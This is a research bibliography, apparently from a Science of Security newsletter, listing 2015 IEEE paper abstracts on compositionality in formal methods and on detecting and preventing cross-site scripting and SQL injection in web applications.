Abstract: Hidden Markov Models, HMM’s, are mathematical models of Markov processes whose state is hidden but from which information can leak via channels. They are typically represented as 3-way joint probability distributions. We use HMM’s as denotations of probabilistic hidden-state sequential programs, after recasting them as “abstract” HMM’s, i.e. computations in the Giry monad D, and equipping them with a partial order of increasing security. However to encode the monadic type with hiding over state X we use DX→D2X rather than the conventional X→DX. We illustrate this construction with a very small Haskell prototype. We then present uncertainty measures as a generalisation of the extant diversity of probabilistic entropies, and we propose characteristic analytic properties for them. Based on that, we give a “backwards”, uncertainty-transformer semantics for HMM’s, dual to the “forwards” abstract HMM’s. Finally, we discuss the Dalenius desideratum for statistical databases as an issue in semantic compositionality, and propose a means for taking it into account.
Keywords: entropy; functional languages; functional programming; hidden Markov models; programming language semantics; statistical databases; statistical distributions; 3-way joint probability distribution; Dalenius desideratum; Giry monad; Haskell prototype; Markov process; abstract HMM; abstract hidden Markov models; mathematical model; monadic account; monadic type encoding; probabilistic entropy; probabilistic hidden-state sequential program; quantitative information flow; semantic compositionality; statistical database; uncertainty measure; uncertainty-transformer semantics; Hidden Markov models; Joints; Markov processes; Measurement uncertainty; Probabilistic logic; Semantics; Uncertainty; Abstract hidden Markov models; Giry Monad; Quantitative information flow (ID#: 16-9541)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7174915&isnumber=7174853

 

S. Gujrati; H. Zhu; G. Singh, “Composable Algorithms for Interdependent Cyber Physical Systems,” Resilience Week (RWS), 2015, Philadelphia, PA, 2015, vol., no., pp. 1–6. doi:10.1109/RWEEK.2015.7287431
Abstract: Cyber-Physical Systems (CPS) applications are being increasingly used to provide services in domains such as health-care, transportation, and energy. Providing such services may require interactions between applications, some of which may be unpredictable. Understanding and mitigating such interactions require that CPSs be designed as open and composable systems. Composition has been studied extensively in the literature. To complement this work, this paper studies composition of cyber algorithms with user behaviors in a CPS. Traditional middleware algorithms have been designed by abstracting away the underlying system and providing users with high-level APIs to interact with the physical system. In a CPS, however, users may interact directly with the physical system and may perform actions that are part of the services provided. We find that by accounting for user interactions and including them as part of the solution, one can design algorithms that are more efficient, predictable and resilient. To accomplish this, we propose a framework to model both the physical and the cyber systems. This framework allows specification of both physical algorithms and cyber algorithms. We discuss how such specifications can be composed to design middleware that leverages user actions. We show that such composite solutions preserve invariants of the component algorithms such as those related to functional properties and fault-tolerance. Our future work involves developing a comprehensive framework that uses compositionality is a key feature to address interdependent behavior of CPSs.
Keywords: formal specification; human computer interaction; middleware; object-oriented programming; open systems; software fault tolerance; user centred design; CPS applications; CPS interdependent behavior; component algorithm; composable algorithms; composable systems; cyber algorithm; energy domain; fault-tolerance; functional properties; health-care domain; high-level API; interdependent cyber-physical systems; middleware algorithm design; middleware design; physical system interaction; specification composition; transportation domain; user action; user behavior; user interaction; Algorithm design and analysis; Computational modeling; Middleware; Prediction algorithms; Sensors; Vehicles (ID#: 16-9542)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7287431&isnumber=7287407

 

V. Koutsoumpas, “A Model-Based Approach for the Specification of a Virtual Power Plant Operating in Open Context,” Software Engineering for Smart Cyber-Physical Systems (SEsCPS), 2015 IEEE/ACM 1st International Workshop on, Florence, 2015, vol., no., pp. 26–32. doi:10.1109/SEsCPS.2015.13
Abstract: Nowadays, it’s widely accepted that the paradigm of closed context systems has altered. As software systems in combination with physical systems, termed Cyber Physical Systems (CPSs) evolve to more and more complex structures to meet the continuously increasing complexity of requirements, they are faced with a variety of challenges. Those systems have to operate in an open context, meaning that the system boundary between the system and the environment changes over time. Furthermore, the operating system has to adapt its behavior to the observed environmental changes. Hence, there is a high need for the establishment of a seamless modeling framework which fosters the modeling of systems operating in open context. In this paper: 1) we explore how a modeling theory based on fuzzy logic allows for a formal specification of such systems 2) we embed the modeling theory to the SPES development method established within the German research project SPES by showing the compositionality of our approach 3) we illustrate on a show case how the approach can be applied exemplary for modeling the behavior of a Virtual Power Plant (VPP).
Keywords: formal specification; fuzzy logic; operating systems (computers); power engineering computing; power plants; CPSs; SPES German research project; SPES development method; cyber physical systems; model-based approach; modeling theory; operating system; software systems; virtual power plant specification; Context; Context modeling; Fuzzy logic; Syntactics; Uncertainty; Unified modeling language (ID#: 16-9543)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7173940&isnumber=7173927

 

S. Calzavara; A. Rabitti; M. Bugliesi, “Compositional Typed Analysis of ARBAC Policies,” Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, Verona, 2015, vol., no., pp. 33–45. doi:10.1109/CSF.2015.10
Abstract: Model-checking is a popular approach to the security analysis of ARBAC policies, but its effectiveness is hindered by the exponential explosion of the ways in which different users can be assigned to different role combinations. In this paper we propose a paradigm shift, based on the observation that, while verifying ARBAC by exhaustive state search is complex, realistic policies often have rather simple security proofs, and we propose to use types as an effective tool to leverage this simplicity. Concretely, we present a static type system to verify the security of ARBAC policies, along with a sound and complete type inference algorithm used to automate the verification process. We then introduce compositionality results, which identify sufficient conditions to preserve the security guarantees obtained by the verification of different sub-policies when these sub-policies are combined together: this compositional reasoning is crucial when policy administration is highly distributed and naturally supports the security analysis of evolving ARBAC policies. We evaluate our approach by implementing TAPA, a static analyser for ARBAC policies based on our theory, which we test on a number of relatively large, publicly available policies from the literature.
Keywords: authorisation; formal specification; formal verification; program diagnostics; reasoning about programs; type theory; ARBAC policy; TAPA; compositional reasoning; compositional typed analysis; exponential explosion; model-checking; paradigm shift; policy administration; realistic policy; security analysis; security guarantee; security proof; state search; static analyser; type inference algorithm; verification process; Access control; Algorithm design and analysis; Labeling; Safety; Semantics; Syntactics (ID#: 16-9544)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243723&isnumber=7243713
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Cross Site Scripting 2015

 

 
SoS Logo

Cross Site Scripting

2015

 

A type of computer security vulnerability typically found in Web applications, cross-site scripting (XSS) enables attackers to inject client-side script into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same origin policy. Consequences may range from petty nuisance to significant security risk, depending on the value of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner. A frequent method of attack, research is being conducted on methods to prevent, detect, and mitigate XSS attacks. The articles cited here were published in 2015.



Gupta, M.K.; Govil, M.C.; Singh, G., “Predicting Cross-Site Scripting (XSS) Security Vulnerabilities In Web Applications,” in Computer Science and Software Engineering (JCSSE), 2015 12th International Joint Conference on, vol., no., pp. 162–167, 22–24 July 2015. doi:10.1109/JCSSE.2015.7219789
Abstract: Recently, machine-learning based vulnerability prediction models are gaining popularity in web security space, as these models provide a simple and efficient way to handle web application security issues. Existing state-of-art Cross-Site Scripting (XSS) vulnerability prediction approaches do not consider the context of the user-input in output-statement, which is very important to identify context-sensitive security vulnerabilities. In this paper, we propose a novel feature extraction algorithm to extract basic and context features from the source code of web applications. Our approach uses these features to build various machine-learning models for predicting context-sensitive Cross-Site Scripting (XSS) security vulnerabilities. Experimental results show that the proposed features based prediction models can discriminate vulnerable code from non-vulnerable code at a very low false rate.
Keywords: Internet; feature extraction; security of data; Web applications; XSS security vulnerability prediction; context-sensitive cross-site scripting; cross-site scripting security vulnerability prediction; feature extraction algorithm; Accuracy; Context; Feature extraction; HTML; Measurement; Predictive models; Security; context-sensitive; cross-site scripting vulnerability; input validation; machine learning; web application security (ID#: 16-9177)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219789&isnumber=7219755

 

Sonewar, P.A.; Mhetre, N.A., “A Novel Approach for Detection of SQL Injection and Cross Site Scripting Attacks,” in Pervasive Computing (ICPC), 2015 International Conference on, vol., no., pp. 1–4, 8–10 Jan. 2015. doi:10.1109/PERVASIVE.2015.7087131
Abstract: Web applications provide vast category of functionalities and usefulness. As more and more sensitive data is available over the internet hackers are becoming more interested in such data revealing which can cause massive damage. SQL injection is one of such attacks. This attack can be used to infiltrate the database of any web application that may lead to alteration of database or disclosing important information. Cross site scripting is one more attack in which attacker obfuscates the input given to the web application that may lead to changes in view of the web page. Three tier web applications can be categorized statically and dynamically for detecting and preventing these types of attacks. Mapping model in which requests are mapped on queries can be used effectively to detect such kind of attacks and prevention logic can be applied.
Keywords: Internet; SQL; Web sites; security of data; SQL injection detection; Web applications; Web page; cross site scripting attack; database infiltration; mapping model; prevention logic; Blogs; Computers; Conferences; Databases; Intrusion detection; Uniform resource locators; Cross Site Scripting (XSS); Intrusion Detection System (IDS); SQL injection attack; Tier Web Application; Web Security Vulnerability (ID#: 16-9178)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7087131&isnumber=7086957

 

Shanmugasundaram, G.; Ravivarman, S.; Thangavellu, P., “A Study on Removal Techniques of Cross-Site Scripting from Web Applications,” in Computation of Power, Energy Information and Communication (ICCPEIC), 2015 International Conference on, vol., no., pp. 0436–0442, 22–23 April 2015. doi:10.1109/ICCPEIC.2015.7259498
Abstract: Cross site scripting (XSS) vulnerability is among the top 10 web application vulnerabilities based on survey by Open Web Applications Security Project of 2013 [9]. The XSS attack occurs when web based application takes input from users through web pages without validating them. An attacker or hacker uses this to insert malicious scripts in web pages through such inputs. So, the scripts can perform malicious actions when a client visits the vulnerable web pages. This study concentrates on various security measures for removal of XSS from web applications (say defensive coding technique) and their issues of defensive technique based on that measures is reported in this paper.
Keywords: Internet; security of data; Web application vulnerability; XSS attack; cross-site scripting; removal technique; Encoding; HTML; Java; Uniform resource locators; cross site scripting; data sanitization; data validation; defensive coding technique; output escaping; scripting languages; vulnerabilities (ID#: 16-9179)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7259498&isnumber=7259434

 

Panja, B.; Gennarelli, T.; Meharia, P., “Handling Cross Site Scripting Attacks Using Cache Check to Reduce Webpage Rendering Time with Elimination of Sanitization and Filtering in Light Weight Mobile Web Browser,” in Mobile and Secure Services (MOBISECSERV), 2015 First Conference on, vol., no., pp. 1–7, 20–21 Feb. 2015. doi:10.1109/MOBISECSERV.2015.7072878
Abstract: In this paper we propose a new approach to prevent and detect potential cross-site scripting attacks. Our method called Buffer Based Cache Check, will utilize both the server-side as well as the client-side to detect and prevent XSS attacks and will require modification of both in order to function correctly. With Cache Check, instead of the server supplying a complete whitelist of all the known trusted scripts to the mobile browser every time a page is requested, the server will instead store a cache that contains a validated “trusted” instance of the last time the page was rendered that can be checked against the requested page for inconsistencies. We believe that with our proposed method that rendering times in mobile browsers will be significantly reduced as part of the checking is done via the server, and fewer checking within the mobile browser which is slower than the server. With our method the entire checking process isn’t dumped onto the mobile browser and as a result the mobile browser should be able to render pages faster as it is only checking for “untrusted” content whereas with other approaches, every single line of code is checked by the mobile browser, which increases rendering times.
Keywords: cache storage; client-server systems; mobile computing; online front-ends; security of data; trusted computing; Web page rendering time; XSS attacks; buffer based cache check; client-side; cross-site scripting attacks; filtering; light weight mobile Web browser; sanitization; server-side; trusted instance; untrusted content; Browsers; Filtering; Mobile communication; Radio access networks; Rendering (computer graphics); Security; Servers; Cross site scripting; cache check; mobile browser; webpage rendering (ID#: 16-9180)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7072878&isnumber=7072857

 

Pandurang, R.M.; Karia, D.C., “A Mapping-Based Model for Preventing Cross Site Scripting and SQL Injection Attacks on Web Application and its Impact Analysis,” in Next Generation Computing Technologies (NGCT), 2015 1st International Conference on, vol., no., pp. 414–418, 4–5 Sept. 2015. doi:10.1109/NGCT.2015.7375152
Abstract: Web applications provide vast category of functionalities and usefulness. As more and more sensitive data is available over the web, crackers are getting attracted in such data revealing which can root immense harm. SQL injection is one of such type of attack. This attack can be used to infiltrate the back-end of any web application that may lead to modification of database or disclosing significant information. Attacker can obfuscate the input given to the web application using Cross site scripting attack that may direct to distortion in the web page view. Three tier web applications can be categorized into static and dynamic web application for detecting and preventing these types of attacks. Mapping model in which requests are mapped on generated queries can be used productively to detect such kind of attacks and prevention logic can be applied for attack removal. The impact measurement of container based approach on the web server is measured using autobench tool, the parameters used are network throughput and response time.
Keywords: Internet; SQL; query processing; security of data; SQL injection attack prevention logic; Web page view; Web server; attack removal; autobench tool; container based approach; cross site scripting attack prevention logic; database modification; dynamic Web applications; generated queries; impact measurement; mapping-based model; network response time; network throughput; static Web applications; Computers; Containers; Databases; Throughput; Time factors; Web servers; Cross Site Scripting (XSS) Attack; Intrusion Detection System (IDS); Mapping model; SQL Injection Attack (ID#: 16-9181)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7375152&isnumber=7375067

 

Rui Wang; Xiaoqi Jia; Qinlei Li; Daojuan Zhang, “Improved N-gram Approach for Cross-Site Scripting Detection in Online Social Network,” in Science and Information Conference (SAI), 2015, vol., no., pp. 1206–1212, 28–30 July 2015. doi:10.1109/SAI.2015.7237298
Abstract: Nowadays Online Social Networks (OSNs) have become a popular web service in the world. With the development of mobile networks, OSNs provide users with online communication platform. However, the OSNs’ openness leads to so much exposure that it brings many new security threats, such as cross-site scripting (XSS) attacks. In this paper, we present a novel approach using classifiers and the improved n-gram model to do the XSS detection in OSN. Firstly, we identify a group of features from webpages and use them to generate classifiers for XSS detection. Secondly, we present an improved n-gram model (a model derived from n-gram model) built from the features to classify webpages. Thirdly, we propose an approach based on the combination of classifiers and the improved n-gram model to detect XSS in OSN. Finally, a method is proposed to simulate XSS worm spread in OSN to get more accurate experiment data. Our experiment results demonstrate that our approach is effective in OSN’s XSS detection.
Keywords: computer crime; pattern classification; social networking (online); OSN openness; Web pages classification; Web service; XSS attacks; XSS detection; XSS worm spread; classifiers; cross-site scripting detection; mobile networks development; n-gram approach; n-gram model; online communication platform; online social network; security threats; Data models; Feature extraction; Grippers; HTML; Libraries; Malware; Social network services; Cross-site Scripting Attacks Detection; N-gram Model; Online Social Networks Security (ID#: 16-9182)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237298&isnumber=7237120

 

Gupta, M.K.; Govil, M.C.; Singh, G.; Sharma, P., “XSSDM: Towards Detection and Mitigation of Cross-Site Scripting Vulnerabilities in Web Applications,” in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, vol., no., pp. 2010–2015, 10–13 Aug. 2015. doi:10.1109/ICACCI.2015.7275912
Abstract: With the growth of the Internet, web applications are becoming very popular in the user communities. However, the presence of security vulnerabilities in the source code of these applications is raising cyber crime rate rapidly. It is required to detect and mitigate these vulnerabilities before their exploitation in the execution environment. Recently, Open Web Application Security Project (OWASP) and Common Vulnerabilities and Exposures (CWE) reported Cross-Site Scripting (XSS) as one of the most serious vulnerabilities in the web applications. Though many vulnerability detection approaches have been proposed in the past, existing detection approaches have the limitations in terms of false positive and false negative results. This paper proposes a context-sensitive approach based on static taint analysis and pattern matching techniques to detect and mitigate the XSS vulnerabilities in the source code of web applications. The proposed approach has been implemented in a prototype tool and evaluated on a public data set of 9408 samples. Experimental results show that proposed approach based tool outperforms over existing popular open source tools in the detection of XSS vulnerabilities.
Keywords: Internet; computer crime; pattern matching; program diagnostics; source code (software); Internet; Web application; XSSDM; context-sensitive approach; cross-site scripting vulnerability detection; cyber crime; pattern matching technique; security vulnerability; source code; static taint analysis; Context; HTML; Reactive power; Security; Sensitivity; Servers; Standards; Context Sensitive; Cross-site scripting (XSS); Pattern matching; Static Analysis; Web Application Security (ID#: 16-9183)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275912&isnumber=7275573

 

Zibordi de Paiva, O.; Ruggiero, W.V., “A Survey on Information Flow Control Mechanisms in Web Applications,” in High Performance Computing & Simulation (HPCS), 2015 International Conference on, vol., no., pp. 211–220, 20–24 July 2015. doi:10.1109/HPCSim.2015.7237042
Abstract: Web applications are nowadays ubiquitous channels that provide access to valuable information. However, web application security remains problematic, with Information Leakage, Cross-Site Scripting and SQL-Injection vulnerabilities — which all present threats to information — standing among the most common ones. On the other hand, Information Flow Control is a mature and well-studied area, providing techniques to ensure the confidentiality and integrity of information. Thus, numerous works were made proposing the use of these techniques to improve web application security. This paper provides a survey on some of these works that propose server-side only mechanisms, which operate in association with standard browsers. It also provides a brief overview of the information flow control techniques themselves. At the end, we draw a comparative scenario between the surveyed works, highlighting the environments for which they were designed and the security guarantees they provide, also suggesting directions in which they may evolve.
Keywords: Internet; SQL; security of data; SQL-injection vulnerability; Web application security; cross-site scripting; information confidentiality; information flow control mechanisms; information integrity; information leakage; server-side only mechanisms; standard browsers; ubiquitous channels; Browsers; Computer architecture; Context; Security; Standards; Web servers; Cross-Site Scripting; Information Flow Control; Information Leakage; SQL Injection; Web Application Security (ID#: 16-9184)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237042&isnumber=7237005

 

Fazzini, M.; Saxena, P.; Orso, A., “AutoCSP: Automatically Retrofitting CSP to Web Applications,” in Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE International Conference on, vol. 1, no., pp. 336–346, 16–24 May 2015. doi:10.1109/ICSE.2015.53
Abstract: Web applications often handle sensitive user data, which makes them attractive targets for attacks such as cross-site scripting (XSS). Content security policy (CSP) is a content-restriction mechanism, now supported by all major browsers, that offers thorough protection against XSS. Unfortunately, simply enabling CSP for a web application would affect the application’s behavior and likely disrupt its functionality. To address this issue, we propose AutoCSP, an automated technique for retrofitting CSP to web applications. AutoCSP (1) leverages dynamic taint analysis to identify which content should be allowed to load on the dynamically-generated HTML pages of a web application and (2) automatically modifies the server-side code to generate such pages with the right permissions. Our evaluation, performed on a set of real-world web applications, shows that AutoCSP can retrofit CSP effectively and efficiently.
Keywords: Internet; security of data; AutoCSP policy; CSP content-restriction mechanism; CSP retrofitting; Web applications; XSS protection; content security policy; cross-site scripting; dynamic taint analysis; dynamically-generated HTML pages; server-side code modification; Algorithm design and analysis; Browsers; HTML; Heuristic algorithms; Security; Servers; Web pages; Content security policy (ID#: 16-9185)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7194586&isnumber=7194545

 

Hazel, J.J.; Valarmathie, P.; Saravanan, R., “Guarding Web Application with Multi-Angled Attack Detection,” in Soft-Computing and Networks Security (ICSNS), 2015 International Conference on, vol., no., pp. 1–4, 25–27 Feb. 2015. doi:10.1109/ICSNS.2015.7292382
Abstract: An important research issue in the design of web application is protecting the front end web application from unauthorized access. Normally the web application is in the front end and database is in the back end and can be accessible using web browser. The database contains valuable information and it is the target for the attackers. There are many security issues in the back end database and many security measures being implemented in order to protect it. The problem here is, the front end application has set accessible by everyone and the attackers are trying to compromise the web front end application which in turn compromise the back end database. Therefore, the challenge here is to provide security to the front end web application thus enhancing security to the back end database. Currently vulnerability scanner is used to provide security to the front end web application. Even though many attacks are possible with it the most common and top most attacks are “Remote file inclusion attack, Query string attack, Union attack, Cross site scripting attack”. The proposed system is based on the design of web application in which it concentrates mainly on the detection and prevention of above said attacks. Initially, the system will show how these attacks are happening in the front end web application and overcoming of these attacks using the proposed algorithms such as longest common subsequence algorithm and brute force string matching algorithm. The successful overcoming of these attacks enhances security in the back end by implementing security in the web front end.
Keywords: Internet; authorisation; database management systems; online front-ends; query processing; Web application; Web browser; Web front end application; back end database; cross site scripting attack; multi-angled attack detection; query string attack; remote file inclusion attack; security issues; security measures; unauthorized access; union attack; Algorithm design and analysis; Browsers; Communication networks; Databases; Force; Reliability; Security; Cross site scripting attack; Query string attack; Remote file inclusion attack; Union attack (ID#: 16-9186)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292382&isnumber=7292366

 

Khan, N.; Abdullah, J.; Khan, A.S., “Towards Vulnerability Prevention Model for Web Browser Using Interceptor Approach,” in IT in Asia (CITA), 2015 9th International Conference on, vol., no., pp. 1–5, 4–5 Aug. 2015. doi:10.1109/CITA.2015.7349842
Abstract: Cross Site Scripting (XSS) is popular security vulnerability in modern web applications. XSS attacks are malicious scripts which are embedded by attackers into the source code of web page to be executed at client side by browsers. Researchers have proposed many techniques for detection and prevention of XSS, but eliminating XSS still remains a challenge. In this paper the authors propose a web security model for XSS vulnerability prevention for web browsers using interceptor approach. Several client and server side solution have been proposed but they degrade the browsing performance and increases configuration overheads. The proposed model is an effective solution with minimal performance overheads using both Client and Server side location in detection and prevention of XSS.
Keywords: Web sites; client-server systems; online front-ends; security of data; Web applications; Web browser; Web page source code; Web security model; XSS attacks; XSS detection; XSS vulnerability prevention; client-server side location; configuration overheads; cross site scripting; interceptor approach; malicious scripts; security vulnerability; vulnerability prevention model; Browsers; Filtering; HTML; Security; Servers; Uniform resource locators; Web pages; Attack; Hybrid; Interceptor; Prevention; Web Security; XSS (ID#: 16-9187)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7349842&isnumber=7349813

 

Hermerschmidt, L.; Kugelmann, S.; Rumpe, B., “Towards More Security in Data Exchange: Defining Unparsers with Context-Sensitive Encoders for Context-Free Grammars,” in Security and Privacy Workshops (SPW), 2015 IEEE, vol., no., pp. 134–141, 21–22 May 2015. doi:10.1109/SPW.2015.29
Abstract: To exchange complex data structures in distributed systems, documents written in context-free languages are exchanged among communicating parties. Unparsing these documents correctly is as important as parsing them correctly because errors during unparsing result in injection vulnerabilities such as cross-site scripting (XSS) and SQL injection. Injection attacks are not limited to the web world. Every program that uses input to produce documents in a context-free language may be vulnerable to this class of attack. Even for widely used languages such as HTML and JavaScript, there are few approaches that prevent injection attacks by context-sensitive encoding, and those approaches are tied to the language. Therefore, the aim of this paper is to derive context-sensitive encoder from context-free grammars to provide correct unparsing of maliciously crafted input data for all context-free languages. The presented solution integrates encoder definition into context-free grammars and provides a generator for context-sensitive encoders and decoders that are used during (un)parsing. This unparsing process results in documents where the input data does neither influence the structure of the document nor change their intended semantics. By defining encoding during language definition, developers who use the language are provided with a clean interface for writing and reading documents written in that language, without the need to care about security-relevant encoding.
Keywords: Internet; context-free grammars; context-free languages; context-sensitive grammars; ata structures; electronic data interchange; security of data; HTML; JavaScript; SQL injection; XSS; complex data structures; context-sensitive decoders; context-sensitive encoders; cross-site scripting; data exchange security; distributed systems; injection attack prevention; security-relevant encoding; unparsing process; Context; Decoding; Encoding; Grammar; Libraries; Security; context-sensitive encoder; encoding table; injection vulnerability; unparser (ID#: 16-9188)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163217&isnumber=7163193

 

Mtsweni, J., “Analyzing the Security Posture of South African Websites,” in Information Security for South Africa (ISSA), 2015, vol., no., pp. 1–8, 12–13 Aug. 2015. doi:10.1109/ISSA.2015.7335063
Abstract: Today, public-facing websites are virtually used across all different sectors by different types of organizations for information sharing and conducting core business activities. At the same time, the increasing use of mobile devices in Africa has also propelled the deployment and adoption of web-based applications. However, as the use of websites increases, so are the cyber-attacks. Web-based attacks are prevalent across the globe, and in South Africa an increase in such attacks is being observed. Research studies also suggest that over 80% of the active websites are vulnerable to a myriad of attacks. This paper reports on a study conducted to passively analyze and determine the security posture of over 70 South African websites from different sectors. The security posture of the local websites was thereafter compared against the top ten (10) global websites. The list of the websites was mainly chosen using the Amazon’s Alexa service. The focus of the study was mainly on the security defense mechanisms employed by the chosen websites. This approach was chosen because the client-side security policies, which may give an indication of the security posture of a website, can be analyzed without actively scanning multiple websites. Consequently, relevant web-based vulnerabilities and security countermeasures were selected for the analysis. The results of the study suggest that most of the 70 South African websites analyzed are vulnerable to cross-site scripting, injection vulnerabilities, clickjacking and man-in-middle attacks. Over 67% of the analyzed websites unnecessarily expose server information, approximately 50% of the websites do not protect session cookies, about 30% of the websites use secure communications, in particular for transmitting users’ sensitive information, and some websites use deprecated security policies. From the study, it was also determined that South African websites lag behind in adopting basic security defense mechanisms when compared against top global websites.
Keywords: Web sites; security of data; Amazon Alexa service; South African Web sites; Web-based applications; Web-based attacks; Web-based vulnerabilities; clickjacking attack; client-side security policy; cross-site scripting attack; cyber-attacks; injection vulnerabilities; man-in-middle attack; mobile devices; public-facing Web sites; security countermeasures; security defense mechanisms; security posture; Banking; Education; Government; Security; TV; World Wide Web; cybersecurity; security policies; south africa; web applications; websecurity; websites (ID#: 16-9189)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335063&isnumber=7335039

 

Wazzan, M.A.; Awadh, M.H., “Towards Improving Web Attack Detection: Highlighting the Significant Factors,” in IT Convergence and Security (ICITCS), 2015 5th International Conference on, vol., no., pp. 1–5, 24–27 Aug. 2015. doi:10.1109/ICITCS.2015.7293028
Abstract: Nowadays, with the rapid development of Internet, the use of Web is increasing and the Web applications have become a substantial part of people’s daily life (e.g. E-Government, E-Health and E-Learning), as they permit to seamlessly access and manage information. The main security concern for e-business is Web application security. Web applications have many vulnerabilities such as Injection, Broken Authentication and Session Management, and Cross-site scripting (XSS). Subsequently, web applications have become targets of hackers, and a lot of cyber attack began to emerge in order to block the services of these Web applications (Denial of Service Attack). Developers are not aware of these vulnerabilities and have no enough time to secure their applications. Therefore, there is a significant need to study and improve attack detection for web applications through determining the most significant factors for detection. To the best of our knowledge, there is not any research that summarizes the influent factors of detection web attacks. In this paper, the author studies state-of-the-art techniques and research related to web attack detection: the author analyses and compares different methods of web attack detections and summarizes the most important factors for Web attack detection independent of the type of vulnerabilities. At the end, the author gives recommendation to build a framework for web application protection.
Keywords: Internet; computer crime; data protection; Web application protection; Web application security; Web application vulnerabilities; Web attack detection; XSS; broken authentication; cross-site scripting; cyber attack; denial of service attack; e-business; hackers; information access; information management; injection; session management; Buffer overflows; Computer crime; IP networks; Intrusion detection; Monitoring; Uniform resource locators (ID#: 16-9190)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7293028&isnumber=729288

 

Jung-Woo Sohn; Jungwoo Ryoo, “Securing Web Applications with Better “Patches“: An Architectural Approach for Systematic Input Validation with Security Patterns,” in Availability, Reliability and Security (ARES), 2015 10th International Conference on, vol., no., pp. 486–492, 24–27 Aug. 2015. doi:10.1109/ARES.2015.106
Abstract: Some of the most rampant problems in software security originate from improper input validation. This is partly due to ad hoc approaches taken by software developers when dealing with user inputs. Therefore, it is a crucial research question in software security to ask how to effectively apply well-known input validation and sanitization techniques against security attacks exploiting the user input-related weaknesses found in software. This paper examines the current ways of how input validation is conducted in major open-source projects and attempts to confirm the main source of the problem as these ad hoc responses to the input validation-related attacks such as SQL injection and cross-site scripting (XSS) attacks through a case study. In addition, we propose a more systematic software security approach by promoting the adoption of proactive, architectural design-based solutions to move away from the current practice of chronic vulnerability-centric and reactive approaches.
Keywords: Internet; security of data; software architecture; SQL injection attack; Web application security; XSS attack; ad hoc approaches; architectural approach; architectural design-based solution; chronic vulnerability-centric approach; cross-site scripting attack; input validation-related attacks; proactive-based solution; reactive approach; sanitization techniques; security patterns; systematic input validation; systematic software security approach; user input-related weaknesses; architectural patterns; improper input validation; intercepting validator; software security (ID#: 16-9191)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299956&isnumber=7299862

 

Xiaobing Guo; Shuyuan Jin; Yaxing Zhang, “XSS Vulnerability Detection Using Optimized Attack Vector Repertory,” in Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC), 2015 International Conference on, vol., no., pp. 29–36, 17–19 Sept. 2015. doi:10.1109/CyberC.2015.50
Abstract: In order to detect the Cross-Site Script (XSS) vulnerabilities in the web applications, this paper proposes a method of XSS vulnerability detection using optimal attack vector repertory. This method generates an attack vector repertory automatically, optimizes the attack vector repertory using an optimization model, and detects XSS vulnerabilities in web applications dynamically. To optimize the attack vector repertory, an optimization model is built in this paper with a machine learning algorithm, reducing the size of the attack vector repertory and improving the efficiency of XSS vulnerability detection. Based on this method, an XSS vulnerability detector is implemented, which is tested on 50 real-world websites. The testing results show that the detector can detect a total of 848 XSS vulnerabilities effectively in 24 websites.
Keywords: Web sites; learning (artificial intelligence); optimisation; security of data; Web applications; XSS vulnerability detection; cross-site script vulnerability detection; machine learning algorithm; optimal attack vector repertory; optimization model; optimized attack vector repertory; real-world Websites; Grammar; HTML; Optimization; Payloads; Testing; Uniform resource locators; Web servers; XSS; attack vector repertory; dynamic analysis; machine learning; web crawler (ID#: 16-9192)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7307783&isnumber=7307766

 

Yen-Lin Chen; Hahn-Ming Lee; Jeng, A.B.; Te-En Wei, “DroidCIA: A Novel Detection Method of Code Injection Attacks on HTML5-Based Mobile Apps,” in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, no., pp. 1014-1021, 20-22 Aug. 2015. doi:10.1109/Trustcom.2015.477
Abstract: Smartphones have become more and more popular recently. There are many different smartphone systems, such as Android, iOS, etc. Based on HTML5, now developers can have a convenient framework to develop cross-platform HTML5- based mobile apps. Unfortunately, HTML5-based apps are also susceptible to cross-site scripting attacks like most web applications. Attackers can inject malicious scripts from many different injection channels. In this paper, we propose a new way to detect a known malicious script injected by using HTML5 text box input type along with “document.getElementById(“TagID”).value”. This new text box injection channel was not detected by other researchers so far because they only analyzed JavaScript APIs, but overlooked HTML files which captured text box input type information. Later, we applied this new method to a vulnerable app set with 8303 cases obtained from Google Play. We detected a total of 351 vulnerable apps with accuracy 99%, which included 347 detected also by other researchers as well as 4 extra vulnerable apps that belonged to this text box injection channel. We also implemented a Code Injection Attack detection tool named DroidCIA that automated the drawing of JavaScript API call graph and the combination of API with HTML information.
